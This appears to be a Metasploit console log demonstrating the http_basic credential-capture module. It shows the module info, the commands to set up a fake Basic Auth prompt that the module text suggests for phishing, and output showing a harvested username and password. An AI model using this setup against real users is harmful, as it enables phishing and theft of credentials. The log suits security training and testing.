msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > info
Name: HTTP Client Basic Authentication Credential Collector
License: Metasploit Framework License (BSD)
saint patrick <email@example.com>
Name Current Setting Required Description
—- ————— ——– ———–
REALM Secure Site yes The authentication realm you’d like to present.
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
This module responds to all requests for resources with a HTTP 401.
This should cause most browsers to prompt for a credential. If the
user enters Basic Auth creds they are sent to the console. This may
be helpful in some phishing expeditions where it is possible to
embed a resource into a page. This attack is discussed in Chapter 3
of The Tangled Web by Michal Zalewski.
msf auxiliary(http_basic) > set SRVHOST Local-IP-Address
msf auxiliary(http_basic) > set URIPATH login
msf auxiliary(http_basic) > exploit
[*] Auxiliary module execution completed
[*] Listening on Local-IP-Address:80…
[*] Using URL: http://Local-IP-Address:80/login
[*] Server started.
msf auxiliary(http_basic) > [*] Remote-IP-Address http_basic – Sending 401 to client
[+] Remote-IP-Address – Credential collected: “cisco:cisco” => /login